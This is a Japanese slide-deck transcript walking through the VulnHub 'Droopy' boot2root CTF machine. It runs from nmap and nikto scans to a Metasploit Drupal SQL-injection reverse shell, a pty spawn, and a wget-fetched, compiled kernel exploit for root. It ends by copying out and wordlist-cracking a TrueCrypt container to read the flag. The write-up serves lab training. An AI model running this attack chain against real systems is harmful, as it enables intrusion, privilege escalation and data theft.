boot2root_kalilinux_droopy

Transcript

1. サーバ侵入手法 Droopy CTF

2. DroopyVM ・インストール https://download.vulnhub.com/droopy/ ・フリーソフトウェアのCMS（コンテンツ・マネジメント・システ ム）のDrupal(ドル―パル)を構築している

3. Virtualbox ダウンロード https://www.virtualbox.org/wiki/Downloads

4. Virtualbox インポート

5. Virtualbox ネットワーク設定

6. Virtualbox ネットワーク設定

7. Virtualbox スナップショット

8. ホスト検索 ①> nmap –sP 192.168.99.0/24 –sP： pingを利用してそのネットワークで現在動作している マシンの一覧を取得する事が出来る

9. ポートスキャン ①> nmap -A 192.168.99.101 -A：OSの種類やその他詳細なバージョン情報などを取得可能

10. ポートスキャン 80番ポートでDrupalが起動しているのがわかりましたので、ブラウ ザでアクセスしてみましょう。

11. ポートスキャン

12. サーバスキャン ①> nikto –h 192.168.99.101 -h：対象のIPアドレスを指定するオプション

13. サーバスキャン nikto

14. 解法 Metasploit framework

15. Metasploit framework drupalを使用してることがわかったので、 KaliLinuxにてMSFで攻 撃を仕掛けてみる。

16. Metasploit framework 今回はSQLインジェクションを利用したペイロードを使用する (「set lhost ローカルホストIPアドレス」も必要かも)

17. Metaspliote framework 準備ができたら実行してリバースシェルを張りましょう。 shellコマンドでshellに入りましょう。

18. 書き込み可能なディレクトリの漏洩 ①> find / -writable -type d 2>/dev/null -writable ：書き込み可能

    -type d ：(d:ディレクトリ f:ファイル l:シンボリックリンク)

19. 疑似端末 疑似端末を割り当てましょう。 疑似端末とは、UNIXにおけるテキスト端末の擬似デバイスのマス ター・スレーブのペアである。 python の ptyモジュールを利用することで疑似端末を制御できま す。 echo "import

    pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py

20. ①> lsb_release -a Linux OSのディストリとバージョンを確認可能だがインストール されていないと使用できない。 ②> cat /etc/issue ディストリビューション環境に関係なくディストリとバージョン

    を確認することが出来ます。 OS情報の漏洩

21. ubuntu 14.04 既存の脆弱性を悪用する

22. 権限昇格 • cd /tmp/ • wget https://www.exlpoit-db.com/download/37292 （KaliでDLしたファイルをwgetしないといけない） • mv

    37292 37292.c • gcc 37292.c -o kernel • chmod 777 kernel • ./kernel • whoami

23. tcファイルのダウンロード ・cd /root ・ls -al ・cp /root/dave.tc /var/www/html/ ・Kaliでhttp://192.168.99.102/dave.tcにアクセス＆DL

24. tcファイル TrueCryptコンテナファイルは暗号化された仮想ドライブファイ ル。 3種類の暗号化アルゴリズムと3種類のハッシュアルゴリズムを選 択できる。 普段はコンピュータ上に表示されず、必要な時だけ認識される秘 密のドライブ。 暗号化ドライブの領域を「見せかけ」と「本命」に分割できる。 このファイルのクラッキングツールとして「TrueCrack」が存在 している。

25. TrueCrack ①> truecrack --truecrypt dave.tc --wordlist rockyou.txt --v erbose tcファイルのパスワードクラッキングが可能

    --truecrypt [file]：tcファイルの指定 --wordlist [file]：ワードリストの指定 --verbose：詳細情報の出力 https://github.com/lvaccaro/truecrack

26. TrueCrack rockyou.txtはワード数が多すぎるためヒントを元にワードを絞っ て実施する必要がある。 さらに、暗号化アルゴリズムの指定（-eオプション）やハッシュア ルゴリズムの指定（-kオプション）を上手く利用する必要がありま した。（デフォルトだとAESでRIPEMD-160です） ヒントは/var/mail/www-dataにありました。 "The password isn't

    longer than 11 characters" "we know what academy we went to" "remember that song by The Jam"

27. TrueCrack

28. cryptsetup • cryptsetup open --type tcrypt dave.tc dave • mkdir

    /media/dave • mount /dev/mapper/dave /media/dave • cd /media/dev • find . • cat .secret/.top/flag.txt